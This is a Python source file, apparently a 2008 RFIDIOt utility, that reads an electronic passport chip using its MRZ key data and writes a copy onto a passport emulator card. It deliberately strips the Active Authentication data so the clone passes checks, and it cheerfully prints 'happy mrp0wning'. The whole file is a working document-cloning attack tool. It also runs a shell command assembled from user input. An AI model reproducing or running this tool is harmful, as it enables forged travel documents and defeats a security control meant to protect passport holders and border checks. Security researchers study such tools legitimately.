#!/usr/bin/python

STRIP_AA= True

#  mrpk0wn.py - write data to the Machine Readable Passport emulator
#  of Jeroen van Beek, version 20080520.
#
#  Author: 
#  vonJeek <vonjeek@thc.org>
#  http://www.thc.org/
#
#  This script uses code snippets of:
#  Adam Laurie <adam@algroup.co.uk>
#  http://rfidiot.org/
# 
#  This code is copyright (c) vonJeek, 2008, All rights reserved.
#  For non-commercial use only, the following terms apply - for all other
#  uses, please contact the author:
#
#    This code is free software; you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation; either version 2 of the License, or
#    (at your option) any later version.
#
#    This code is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#------------------------------------------------------------------------------
import RFIDIOtconfig
import sys
import os
import commands
import string
import binascii
from operator import *
import StringIO
#------------------------------------------------------------------------------
MAXCHUNK=250
args= RFIDIOtconfig.args
#------------------------------------------------------------------------------
def select_file(file):
	"select file"
	cla= '10'
	ins= 'VONJEEK_SELECT_FILE'	
	p1= '00'
	p2= '00'
	data= "02" + file
	passport.send_apdu('','','','',cla,ins,p1,p2,'',data,'')
	if not passport.errorcode == '9000':
		print 'This card doesn\'t seem to be an emulator, aborting.'
		os._exit(False)	
#------------------------------------------------------------------------------
def select_passport_app():
	"select passport specific application (AID: A0000002471001)"
	ins= 'SELECT_FILE'
	p1= '04'
	p2= '0C'
	lc= '07'
	data= 'A0000002471001'
	passport.send_apdu('','','','','',ins,p1,p2,lc,data,'')
	if passport.errorcode == '9000':
		return True
	else:
		return False
#------------------------------------------------------------------------------
def write_file(file,infile):
	"write data to file"	
	if not passport.hsselect('08') or not select_passport_app():
		print "Couldn't select the ePassport application, aborting."
		os._exit(False)
	try:
		fd= open(infile, mode='rb')
	except:
		print "Can't open %s, aborting." % infile
		os._exit(False)
	data= fd.read()
	fd.close()	
	
	if STRIP_AA:
		#remove DG15 since we cannot access the private key using just a python script
		if file == '011E':
			if passport.ToHex(data[(len(data)-1)]).upper() == '6F':
				temp= data[0:1] + binascii.a2b_hex('%02X' % (len(data)-3)) + data[2:(len(data)-4)]
				mylen= (int)(passport.ToHex(data[19]), 16) -1
				temp= temp + binascii.a2b_hex('%02X' % mylen) + data[20:(len(data)-1)]		
				data= temp
				print 'Removed Active Authentication.'
							
	select_file(file)
	offset= 0
	towrite= len(data)
	while towrite:
		if towrite > MAXCHUNK:
			chunk= MAXCHUNK
		else:
			chunk= towrite
		print "\rWriting " + infile + ": %d bytes left...    " % (towrite-chunk),
		sys.stdout.flush()
		update_binary(offset,data[offset:offset + chunk])
		offset += chunk
		towrite -= chunk
#------------------------------------------------------------------------------
def update_binary(offset,data):
	"write a chunk of data to an offset within the currently selected file"
	hexoff= "%04x" % offset
	cla= '10'
	ins= 'VONJEEK_UPDATE_BINARY'
	p1= hexoff[0:2]
	p2= hexoff[2:4]
	lc= "%02x" % len(data)
	data= passport.ToHex(data)
	if passport.send_apdu('','','','',cla,ins,p1,p2,lc,data,''):
		return passport.data
	passport.iso_7816_fail(passport.errorcode)
#------------------------------------------------------------------------------
def personalise(documentnumber,dob,expiry):
	"set the secret key for the document"
	print 'Setting the secret key to ' + documentnumber + calculate_check_digit(documentnumber) + dob + calculate_check_digit(dob) + expiry + calculate_check_digit(expiry) + '.'
	#print 'Setting the secret key to ' + '**********' + dob + calculate_check_digit(dob) + '*******.'
	cla= '10'
	ins= 'VONJEEK_SET_MRZ'
	p1= '00'
	p2= '00'	
	data= passport.ToHex(documentnumber) +  passport.ToHex(calculate_check_digit(documentnumber)) + passport.ToHex(dob) + passport.ToHex(calculate_check_digit(dob)) + passport.ToHex(expiry) + passport.ToHex(calculate_check_digit(expiry))
	lc= '18'
	if passport.send_apdu('','','','',cla,ins,p1,p2,lc,data,''):
		return passport.data
	passport.iso_7816_fail(passport.errorcode)
#------------------------------------------------------------------------------
def read_document(documentnumber, dob, expiry):
	"read document"
	raw_input('Put a ePassport near the terminal and press enter to continue...')
	print 'Reading document using KEY ' + documentnumber + dob + expiry + ', please be patient...'
	#print 'Reading document using KEY ' + '*********' + dob + '******' + ', please be patient...'

	key= documentnumber + 'xxxx' + dob + 'xx' + expiry + 'xxxxxxxxxxxxxxxxx'
	if os.name == 'nt':
		cmd = 'mrpkey.py \"' + key + '\" NOGUI > nul'
	else:
		cmd = './mrpkey.py \'' + key + '\' NOGUI > /dev/null'
	exitstatus= os.system(cmd)	
	if not exitstatus:
		print 'Problem calling or executing mrpkey, aborting.'
		print 'Please manually check the output of:'
		print
		print cmd
		os._exit(False)	
#------------------------------------------------------------------------------
def write_document(path, documentnumber, dob, expiry):
	"write document"
	raw_input('Put the emulator near the terminal and press enter to continue...')
	print 'Writing new ePassport using files in ' + path + '.'	

	if not os.access(path + '/EF_COM.BIN',os.F_OK) or  not os.access(path + '/EF_SOD.BIN',os.F_OK) or  not os.access(path + '/EF_DG1.BIN',os.F_OK) or  not os.access(path + '/EF_DG2.BIN',os.F_OK):
		print 'Cannot find all required files (EF_COM, EF_SOD, EF_DG1, EF_DG2), aborting.'
		os._exit(False)		

	#required stuff
	write_file('011E', path + '/EF_COM.BIN')
	print
	write_file('011D', path + '/EF_SOD.BIN')
	print
	write_file('0101', path + '/EF_DG1.BIN')
	print
	write_file('0102', path + '/EF_DG2.BIN')
	print
	#optional stuff
	#used in e.g. US passports
	if os.access(path + '/EF_DG11.BIN',os.F_OK):		
		write_file('010b', path + '/EF_DG11.BIN')	
		print	
	#used in e.g. US passports
	if os.access(path + '/EF_DG12.BIN',os.F_OK):
		write_file('010c', path + '/EF_DG12.BIN')	
		print	
	#used in e.g. JPN passports
	if os.access(path + '/EF_DG13.BIN',os.F_OK):
		write_file('010d', path + '/EF_DG13.BIN')	
		print	
	#used in e.g. Dutch passports
	if os.access(path + '/EF_DG15.BIN',os.F_OK):
		write_file('010f', path + '/EF_DG15.BIN')	
		print			
		
	#personalise the copy
	personalise(documentnumber, dob, expiry)
	
	print 'Done, happy mrp0wning ;)'
	print
	print 'Use the following command to read the chip:'
	print './mrpkey.py \"' + documentnumber + 'xxxx' + dob + 'xx' + expiry + 'xxxxxxxxxxxxxxxxx\"'
	#print './mrpkey.py \"' + '*********' + 'xxxx' + dob + 'xx' + '******' + 'xxxxxxxxxxxxxxxxx\"'
	
#------------------------------------------------------------------------------
def calculate_check_digit(data):
	"calculate ICAO 9303 check digit"
	MRZ_WEIGHT= [7,3,1]
	cd= n= 0
	for d in data:
		if 'A' <= d <= 'Z':
			value = ord(d)-55
		elif d == '<':
			value = 0
		else:
			value = int(d)
		cd += value * MRZ_WEIGHT[n % 3]
		n += 1
	return '%s' % (cd % 10)
#------------------------------------------------------------------------------
def help():
	"help"	
	print
	print 'Usage:'
	print sys.argv[0] + ' [CLONE KEY] | [WRITE PATH]'
	print
	print 'Use CLONE and specify KEY to read an existing document using mrpkey.py and to'
	print 'create a copy. KEY consists of <DOCUMENT NUMBER><DATE OF BIRTH><DATE OF EXPIRY>'
	print 'where a date is formatted like YYMMDD.'
	print
	print 'Use WRITE and specify PATH to use previously saved files (using mrpkey.py).'
	print
	print 'Example to create a clone:   \"./mrp0wn.py CLONE P12345678773011120101\".'
	print 'Example to write saved data: \"./mrp0wn.py WRITE /tmp\".'
	print
	os._exit(False)
#------------------------------------------------------------------------------	
print
print '==============================================================================='
print '= mrp0wn.py, an RFIDIOt ePassport utility by vonJeek <mailto:vonjeek@thc.org> ='
print '= Use Jeroen van Beek\'s ePassport emulator as the target device.              ='
print '==============================================================================='
if len(args) != 2 :
	help()	
if not os.access('./mrpkey.py',os.F_OK):
	print 'Cannot find mrpkey.py, aborting. Please move this script to the RFIDIOt folder.'
	os._exit(False)	
try:
	passport= RFIDIOtconfig.card
except:
	print 'RFIDIOt problem, aborting. Please check installation and configuration.'
	os._exit(False)

if args[0] == 'CLONE':
	if len(args[1]) != 21:
		print 'Invalid KEY entered.'
		help()
	else:
		args[1]= args[1].upper()
		documentnumber= args[1][0:9]
		dob= args[1][9:15]
		expiry= args[1][15:21]				
		read_document(documentnumber, dob, expiry)
		#for a non-default setup of tempfiles@mrpkey: change '/tmp' to mrkkey's tempfiles value
		write_document('/tmp', documentnumber, dob, expiry)	
		
elif args[0] == 'WRITE':
	if not os.access(args[1],os.F_OK):
		print 'Cannot access PATH.'
		help()
	else:		
		path= args[1]
		#read KEY
		try:
			infile= path + '/EF_DG1.BIN'
			fd= open(infile, mode='rb')
		except:
			print "Can't open %s" % infile
			os._exit(False)
		data= fd.read()
		fd.close()
		type= data[5:6]
		if type == 'P':
			print 'Document type is PASSPORT.'
			documentnumber= data[49:58]
			dob= data[62:68]
			expiry= data[70:76]
		elif type == 'I':
			print 'Document type is ID.'
			documentnumber= data[10:19]
			dob= data[35:41]
			expiry= data[43:49]		
		else:
			print 'Unknown document type, aborting.'
			os._exit(False)	
		write_document(path, documentnumber, dob, expiry)
else:
	print 'Invalid options entered.'  
	help()
print
os._exit(True)
#------------------------------------------------------------------------------
